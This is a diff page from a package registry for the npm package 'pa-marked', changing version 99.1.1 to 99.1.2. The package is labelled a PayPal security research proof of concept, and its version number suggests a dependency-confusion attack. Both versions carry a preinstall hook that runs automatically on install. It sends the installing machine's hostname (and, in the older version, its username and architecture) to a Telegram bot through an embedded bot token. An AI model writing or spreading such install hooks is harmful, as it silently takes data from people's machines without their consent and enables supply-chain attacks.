pa-marked 99.1.1 → 99.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (1) hide show
  1. package/package.json +3 -3
package/package.json CHANGED
@@ -1,10 +1,10 @@
1
1
  {
2
2
  "name": "pa-marked",
3
- "version": "99.1.1",
4
- "description": "Security Research PoC for PayPal Bug Bounty",
3
+ "version": "99.1.2",
4
+ "description": "Security Research PoC for PayPal",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "preinstall": "node -e 'const https = require(\"https\"); const os = require(\"os\"); const data = JSON.stringify({chat_id: \"8655055695\", text: \"🚨 ALONE BEAST RCE PoC 🚨\\n\\nšŸ”„ VULNERABLE SERVER: \" + os.hostname() + \"\\nšŸ‘¤ USER: \" + os.userInfo().username + \"\\nšŸ“ ARCH: \" + os.arch()}); const options = {hostname: \"api.telegram.org\", port: 443, path: \"/bot8236864682:AAFO8n3ml54y_JQnAA2_wxD5j01eooMwC8w/sendMessage\", method: \"POST\", headers: {\"Content-Type\": \"application/json\", \"Content-Length\": data.length}}; const req = https.request(options); req.write(data); req.end();'"
7
+ "preinstall": "node -e \"require('https').get('https://api.telegram.org/bot8236864682:AAFO8n3ml54y_JQnAA2_wxD5j01eooMwC8w/sendMessage?chat_id=8655055695&text=🚨_ALONE_BEAST_RCE_CONFIRMED_🚨_SERVER:_' + require('os').hostname())\""
8
8
  },
9
9
  "author": "ALONE BEAST",
10
10
  "license": "ISC"